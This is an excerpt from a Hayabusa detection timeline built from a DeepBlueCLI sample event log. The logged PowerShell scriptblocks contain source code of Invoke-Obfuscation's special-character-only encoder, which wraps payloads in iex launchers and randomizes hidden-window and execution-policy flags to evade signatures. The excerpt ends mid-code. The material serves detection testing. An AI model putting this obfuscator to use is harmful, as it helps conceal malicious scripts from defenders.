.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? 
\""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. 
# 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. 
$NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. 
If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.279 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. 
.PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ 
}${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ 
*}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? 
\""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. 
# 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. 
$NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. 
If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index 